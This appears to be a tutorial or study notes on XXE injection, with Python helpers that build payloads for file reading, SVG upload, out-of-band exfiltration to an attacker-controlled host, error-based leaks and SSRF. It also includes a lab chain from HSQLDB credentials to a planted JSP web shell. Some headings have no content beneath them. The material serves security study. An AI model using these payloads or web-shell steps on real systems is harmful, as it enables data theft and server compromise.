XML External Entity (XXE) Injection
XML is designed to encode data in a way that’s easier for humans and machines to read. The layout of an XML document is somewhat similar to an HTML document, although there are differences in implementations.
An application that relies on data stored in the XML format will inevitably make use of an XML parser or processor. The application calls this component when XML data needs to be processed. XML processors can suffer from different types of vulnerabilities originating from malformed or malicious input data (Information Disclosure, Server-Side Request Forgery, Denial of Service, Remote Command Injection).
Theory
- XML Entities in DTDs
DTDs can declare XML entities in XML documents.
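An XML entity is a named piece of content (text or XML markup) that can be referenced multiple times in a document.
There are three main types of XML entity: internal, external (private and public), and parameter. External entities can additionally be declared as unparsed.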
Internal Entities:
Locally defined
Format: <!ENTITY name "entity_value">
Example: <!ENTITY test "<entity-value>test value</entity-value>">
External Entities:
Used for referencing data not defined locally.
Private external entity format: <!ENTITY name SYSTEM "URI">
Example of private external entity: <!ENTITY hola SYSTEM "http://www.example.com/company.xml">
Public external entity format: <!ENTITY name PUBLIC "public_id" "URI">
Example of public external entity: <!ENTITY hola PUBLIC "-//W3C//TEXT companyinfo//EN" "http://www.example.com/companyinfo.xml">
Parameter Entities:
Exist only within DTDs.
Format: <!ENTITY % name "entity_value"> or, for an external parameter entity, <!ENTITY % name SYSTEM "URI">
Example: <!ENTITY % course 'AWAE'>, <!ENTITY Title 'Offensive Security presents %course;' >
Unparsed External Entities:
XML entities can contain non-XML data.
Use NDATA declaration to prevent XML parser processing.
Format for public and private external entities: <!ENTITY name SYSTEM "URI" NDATA TYPE> or <!ENTITY name PUBLIC "public_id" "URI" NDATA TYPE>.
Allows access to binary content, useful in web application environments lacking I/O stream manipulation flexibility.
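To make entity substitution concrete, here is a minimal sketch using Python's standard-library parser. The document and the entity name are illustrative assumptions, and only an internal entity is used, so nothing outside the string is read.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: one internal entity declared in the DTD, referenced once.
DOC = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY test "test value">
]>
<note>&test;</note>"""

# The parser substitutes the entity's value for the &test; reference while parsing.
root = ET.fromstring(DOC)
print(root.text)
```

An external entity would be declared the same way, with SYSTEM and a URI in place of the quoted value.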
- XML External Entity (XXE) injection is an attack against XML parsers
Attacker forces the XML parser to process external entities.
Can lead to disclosure of confidential information.
Requires maliciously-crafted XML request with system identifiers pointing to sensitive data.
Can be used to exfiltrate data, including binary content.
Depending on the application's programming language and protocol wrappers, may lead to command injection.
In PHP, for example, XXE can result in remote code execution when the expect:// wrapper is available (it requires the expect extension to be loaded).
- Finding the Attack Vector
Demonstrates XXE attack with examples.
XML parser replaces entity reference with entity's value.
Changing an internal entity to an external entity referencing a file on the server can lead to reading server files.
Vulnerable parsers load file contents and place them in the XML document.
XXE payload should be injected into a field displayed in the web application.
Suggested target: Accounts page with XML input, where XXE payloads can be used in text fields to observe attack results in the web application.
XXE to retrieve files or obtain data
To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways: introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file, and edit a data value in the XML that is returned in the application's response so that it makes use of the defined external entity.
- No Defenses Applied from the App
Normal Request:
Payload:
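The original request and payload are not reproduced here. As a hedged sketch, the pair could look like the following; the stockCheck and productId element names and the entity name xxe are assumptions borrowed from a typical lab scenario, not from this application.

```python
# Hypothetical normal request body (element names are assumptions).
NORMAL_REQUEST = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<stockCheck><productId>381</productId></stockCheck>"
)


def build_file_read_payload(path: str) -> str:
    """Return the same body with an external entity that points at `path`."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        # Step 1: a DOCTYPE that defines the external entity.
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://{path}"> ]>'
        # Step 2: a reflected data value that references the entity.
        "<stockCheck><productId>&xxe;</productId></stockCheck>"
    )


payload = build_file_read_payload("/etc/passwd")
print(payload)
```

If the parser is vulnerable and the productId value is echoed back, the response would contain the file contents in place of the product ID.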
- XInclude to retrieve files
Some applications receive client-submitted data, embed it on the server side into an XML document, and then parse the document. In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:
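A minimal sketch of such a value, assuming the wrapper element name foo and the target path are free choices. The standard-library parser is used only to confirm the value is well formed; it does not resolve xi:include by itself.

```python
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def build_xinclude_value(path: str) -> str:
    """Return a data value that asks an XInclude-aware parser to inline `path`."""
    return (
        f'<foo xmlns:xi="{XINCLUDE_NS}">'
        # parse="text" requests the file as plain text rather than as XML.
        f'<xi:include parse="text" href="file://{path}"/>'
        "</foo>"
    )


value = build_xinclude_value("/etc/passwd")
# Well-formedness check only; no file is read here.
include = ET.fromstring(value)[0]
print(include.tag, include.attrib["href"])
```

The resulting string is submitted as the single data value you control, for example a form parameter.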
- XXE attacks via modified content type
Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.
For example, if a normal request contains the following:
Then you might be able to submit the following request, with the same result:
If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting the request as XML.
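The conversion can be sketched as follows. This assumes the parameter names are valid XML element names and that a hypothetical root wrapper element is acceptable when there are several parameters; the Content-Type header would also need to change, for example to text/xml.

```python
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape


def form_to_xml(body: str) -> str:
    """Re-express an application/x-www-form-urlencoded body as an XML body."""
    pairs = parse_qsl(body, keep_blank_values=True)
    elements = "".join(f"<{key}>{escape(value)}</{key}>" for key, value in pairs)
    if len(pairs) != 1:
        # Assumption: several parameters are wrapped in a single root element.
        elements = f"<root>{elements}</root>"
    return '<?xml version="1.0" encoding="UTF-8"?>' + elements


print(form_to_xml("foo=bar"))
```

Once the application accepts the XML form of the request, a DOCTYPE can be added to it as in the classic attack.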
- XXE via image file upload
Create a local SVG image with the following content:
Upload the image. When you then view your comment, avatar, or image, the contents of the /etc/hostname file should be rendered inside the image.
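The SVG content is not shown above; a hedged sketch of a file that would produce this effect follows. The dimensions, font size, and entity name are assumptions, and save_svg is a hypothetical helper that is defined but not called.

```python
from pathlib import Path


def build_svg(path: str = "/etc/hostname") -> str:
    """Return an SVG whose text node references an external entity."""
    return (
        '<?xml version="1.0" standalone="yes"?>'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file://{path}"> ]>'
        '<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
        # The entity is expanded into visible text when the image is processed.
        '<text font-size="16" x="0" y="16">&xxe;</text>'
        "</svg>"
    )


def save_svg(dest: str) -> None:
    """Write the SVG to disk so it can be uploaded."""
    Path(dest).write_text(build_svg(), encoding="utf-8")


svg = build_svg()
print(svg)
```

This only works if the server-side image library parses the SVG as XML with external entities enabled.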
- Blind XXE with out-of-band (OOB) interaction
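XML parameter entities can be used when regular entities are blocked. They differ from regular entities in two ways. First, the declaration of an XML parameter entity includes the percent character before the entity name: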
And second, parameter entities are referenced using the percent character instead of the usual ampersand:
If this and other XML injections do not work, try an out-of-band XXE that loads an external URL under our control (Burp Collaborator, Ngrok, …):
If nothing is shown in the response but we receive a hit on our server, then it is a blind XXE with out-of-band (OOB) interaction.
From here we can, for example, host a malicious DTD on that server and have the parser load it.
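The declaration and reference syntax, and the resulting out-of-band probe, can be sketched as follows. The callback URL is a placeholder for a server you control, and the foo element name is an assumption.

```python
def build_oob_probe(callback_url: str, use_parameter_entity: bool = True) -> str:
    """Return a document that makes a vulnerable parser fetch `callback_url`."""
    if use_parameter_entity:
        # Declared with "%" before the name and referenced as %xxe; inside the DTD.
        doctype = f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{callback_url}"> %xxe; ]>'
        body = "<foo/>"
    else:
        # Regular entity: declared without "%" and referenced as &xxe; in the body.
        doctype = f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{callback_url}"> ]>'
        body = "<foo>&xxe;</foo>"
    return '<?xml version="1.0" encoding="UTF-8"?>' + doctype + body


probe = build_oob_probe("http://attacker.example/")
print(probe)
```

A DNS lookup or HTTP request arriving at the callback host indicates that the parser resolved the entity, even though the response shows nothing.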
- Blind XXE to exfiltrate data using a malicious external DTD
First, we create a malicious DTD:
Then we point the payload at the URL of the server hosting the malicious DTD:
Then we have to base64-decode the data received:
echo "{blob received}" | base64 -d; echo
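The DTD and the loader are not shown above. The following is a sketch under the assumption that the target runs PHP, so that the php://filter wrapper can base64-encode the file (which is why a decoding step is needed). The host names and the x query parameter are hypothetical.

```python
import base64


def build_exfil_dtd(target: str, callback_url: str) -> str:
    """Return the external DTD to host on the attacker's server."""
    return (
        # Read the file, base64-encoded so it survives inside a URL.
        f'<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={target}">\n'
        # &#x25; is an escaped "%": it declares a parameter entity inside an entity value.
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{callback_url}/?x=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def build_loader(dtd_url: str) -> str:
    """Return the payload sent to the target; it only loads the external DTD."""
    return f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe; ]><foo/>'


def decode_blob(blob: str) -> str:
    """Decode the value seen in the attacker's server log."""
    # "+" can arrive as a space when the blob travels in a query string.
    return base64.b64decode(blob.strip().replace(" ", "+")).decode("utf-8", "replace")


dtd = build_exfil_dtd("/etc/passwd", "http://attacker.example")
loader = build_loader("http://attacker.example/malicious.dtd")
print(dtd)
print(loader)
```

decode_blob does the same job as the base64 -d command above, in case the blob needs URL clean-up first.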
- Blind XXE to retrieve data via error messages
An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.
You can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:
Then we invoke it as in the blind XXE with out-of-band (OOB) interaction case; the result is an error message revealing the contents of the target file.
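A sketch of such a DTD follows. The entity names and the /nonexistent/ path are arbitrary choices; any path that cannot exist would serve the same purpose.

```python
def build_error_dtd(target: str = "/etc/passwd") -> str:
    """Return an external DTD that leaks `target` through a parser error."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target}">\n'
        # The file contents become part of a path that cannot be opened,
        # so the parser's error message echoes them back.
        "<!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\">\n"
        "%eval;\n"
        "%error;\n"
    )


error_dtd = build_error_dtd()
print(error_dtd)
```

The technique depends on the application returning parser error messages in its response.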
- Blind XXE by repurposing a local DTD
When out-of-band connections are blocked, this attack invokes a DTD file that happens to exist on the local filesystem and repurposes it, redefining an existing entity in a way that triggers a parsing error containing sensitive data.
First, we have to locate an existing DTD file to repurpose. We can test for common DTD files until we find one that is present:
Then, we need to obtain a copy of the file and review it to find an entity that we can redefine. Since many common systems that include DTD files are open source, you can normally obtain a copy quickly through an internet search.
For example, suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd, and this DTD file defines an entity called custom_entity. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd file by submitting a hybrid DTD like the following:
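Both steps can be sketched as follows: a probe that only loads a candidate local DTD, and the hybrid DTD that redefines custom_entity. The function names are hypothetical; the paths and the entity name come from the example above.

```python
def build_local_dtd_probe(dtd_path: str) -> str:
    """Return a DOCTYPE that errors out only if `dtd_path` does not exist."""
    return (
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % local_dtd SYSTEM "file://{dtd_path}">\n'
        "%local_dtd;\n"
        "]>"
    )


def build_hybrid_dtd(dtd_path: str, entity_name: str, target: str) -> str:
    """Redefine `entity_name` from the local DTD so that parsing leaks `target`."""
    return (
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % local_dtd SYSTEM "file://{dtd_path}">\n'
        # The redefinition is one quoted value, so "%", "&" and "'" are escaped.
        f"<!ENTITY % {entity_name} '\n"
        f'<!ENTITY &#x25; file SYSTEM "file://{target}">\n'
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        '&#x27;file:///nonexistent/&#x25;file;&#x27;>">\n'
        "&#x25;eval;\n"
        "&#x25;error;\n"
        "'>\n"
        # Loading the local DTD last makes it use the redefined entity.
        "%local_dtd;\n"
        "]>"
    )


probe = build_local_dtd_probe("/usr/local/app/schema.dtd")
hybrid = build_hybrid_dtd("/usr/local/app/schema.dtd", "custom_entity", "/etc/passwd")
print(hybrid)
```

The redefinition takes effect because the first declaration of an entity wins, and the internal subset is processed before the local DTD is loaded.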
Information Disclosure
- File Reading
Use a POST request to /account with "application/xml" as the request body format.
Inspect sample objects in the model and find a simple example to use in the POST body.
Modify the POST request to include a simple DOCTYPE and ENTITY for testing.
Once we notice internal entities are being parsed successfully, we will attempt to use an external entity to reference a file on the server:
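The two test requests can be sketched as follows. The base URL, the account and lastName element names, and the entity name probe are hypothetical, since the sample object from the model is not reproduced here. The requests are built but not sent.

```python
from urllib.request import Request

BASE_URL = "http://target.example"  # hypothetical host


def build_account_request(entity_decl: str) -> Request:
    """Build a POST to /account whose body references the &probe; entity."""
    body = (
        '<?xml version="1.0"?>'
        f"<!DOCTYPE data [ {entity_decl} ]>"
        # Hypothetical object; use a real sample from the application's model.
        "<account><lastName>&probe;</lastName></account>"
    )
    return Request(
        BASE_URL + "/account",
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


# Step 1: an internal entity confirms that the DTD is processed at all.
internal = build_account_request('<!ENTITY probe "internal entity works">')
# Step 2: an external entity references a file on the server.
external = build_account_request('<!ENTITY probe SYSTEM "file:///etc/passwd">')
print(external.data.decode())
```

Either request could be sent with urllib.request.urlopen; the response field that echoes lastName would then show the entity value.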
- Enumerate contents of directories
- Enumerate the whole server's file system through recursive XXE attack
- Script to cleanly display XXE attack results
- File Reading using CDATA Sections
Directly reading files via XXE can cause parser errors if the file contains XML-specific characters like "<" and ">".
The solution is CDATA sections: XML's CDATA sections ensure the parser treats the file contents as text, not markup. A CDATA section starts with <![CDATA[ and ends with ]]>.
First, create a malicious DTD on the attacker's server:
sudo cat /var/www/html/wrapper.dtd
Now, update the payload to reference this DTD:
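The contents of wrapper.dtd and the updated payload are not shown above; a hedged sketch follows. The entity names, the data element, and the attacker URL are assumptions. The concatenation lives in the external DTD because parameter-entity references are not allowed inside entity values in the internal subset.

```python
# Contents for /var/www/html/wrapper.dtd on the attacker's server:
# joins the CDATA opener, the file contents, and the CDATA terminator.
WRAPPER_DTD = '<!ENTITY wrapper "%start;%file;%end;">\n'


def build_cdata_payload(target: str, dtd_url: str) -> str:
    """Return a payload that reads `target` wrapped in a CDATA section."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        '<!ENTITY % start "<![CDATA[">\n'
        f'<!ENTITY % file SYSTEM "file://{target}">\n'
        '<!ENTITY % end "]]>">\n'
        # Load the external DTD, which defines &wrapper; from the three parts.
        f'<!ENTITY % dtd SYSTEM "{dtd_url}">\n'
        "%dtd;\n"
        "]>\n"
        "<data>&wrapper;</data>"
    )


payload = build_cdata_payload("/etc/passwd", "http://attacker.example/wrapper.dtd")
print(payload)
```

A file that itself contains the sequence ]]> would still break parsing, since it terminates the CDATA section early.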
- Enumerate contents of directories using CDATA Sections
XXE to perform SSRF attacks
In this combined XXE and SSRF attack, once internal ports or internal IPs have been discovered through SSRF, we start the XXE attack against them:
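A minimal sketch of the payload, assuming the discovered service speaks HTTP. The host, the ports, and the foo element are placeholders.

```python
def build_ssrf_payload(host: str, port: int, path: str = "/") -> str:
    """Return a document whose external entity points at an internal service."""
    url = f"http://{host}:{port}{path}"
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        # The server-side parser, not the attacker, makes the HTTP request.
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{url}"> ]>'
        "<foo>&xxe;</foo>"
    )


# Hypothetical targets found during the SSRF phase.
payloads = [build_ssrf_payload("127.0.0.1", port) for port in (8080, 9001)]
print(payloads[0])
```

If the entity value is reflected, the response body of the internal service appears in the application's response; otherwise the interaction is blind.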
XXE to RCE
- Tomcat and openCRX RCE through XXE and HSQLDB database access
First, XXE was exploited to read tomcat-users.xml for credentials, but we were unable to leverage XXE to access Tomcat Manager due to role restrictions.
Using XXE we obtained directory listings, which led to the discovery of database-related files and credentials at /home/student/crx/data/hsqldb/.
Then, we found a JDBC connection string in the dbmanager.sh file, indicating the use of HSQLDB. It contained the credentials: username sa and password manager99.
To check database accessibility:
nmap -p 9001 [server IP]
To connect to HSQLDB:
java -cp hsqldb.jar org.hsqldb.util.DatabaseManagerSwing --url jdbc:hsqldb:hsql://opencrx:9001/CRX --user sa --password manager99
Once in the database, we used HSQLDB's Java Language Routines (JRTs), which allow Java static methods to be called from SQL:
CREATE FUNCTION systemprop(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
Then, we will use the writeBytesToFilename method from com.sun.org.apache.xml.internal.security.utils.JavaUtils to write files to the server (convert payload to bytes using Burp Suite's Decoder tool):
CREATE PROCEDURE writeBytesToFilename(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
Then, create a JSP web shell to execute commands on the server (the default Kali JSP web shell is at /usr/share/webshells/jsp/cmdjsp.jsp):
call writeBytesToFilename('path/to/shell.jsp', cast ('[converted shell content]' AS VARBINARY(1024)))
call writeBytesToFilename('../../apache-tomee-plus-7.0.5/apps/opencrx-coreCRX/opencrx-core-CRX/shell.jsp', cast ('[converted shell content]' AS VARBINARY(1024)))
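The conversion step can also be scripted instead of using Burp Suite's Decoder. This sketch assumes the converted content is an ASCII-hex string, and build_write_call is a hypothetical helper, not part of HSQLDB.

```python
MAX_BYTES = 1024  # matches VARBINARY(1024) in the procedure declaration


def build_write_call(dest: str, content: bytes) -> str:
    """Return the SQL call that writes `content` to `dest` (hex-encoded)."""
    if len(content) > MAX_BYTES:
        raise ValueError(f"content is {len(content)} bytes; the limit is {MAX_BYTES}")
    # Assumption: the cast accepts the bytes as an ASCII-hex string.
    return (
        f"call writeBytesToFilename('{dest}', "
        f"cast ('{content.hex()}' AS VARBINARY({MAX_BYTES})))"
    )


print(build_write_call("path/to/shell.jsp", b"AB"))
```

A file larger than 1024 bytes would need a larger VARBINARY size in the procedure declaration.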
Now, we can access the uploaded JSP shell via browser or curl:
curl http://opencrx:8080/path/to/shell.jsp?cmd=[command]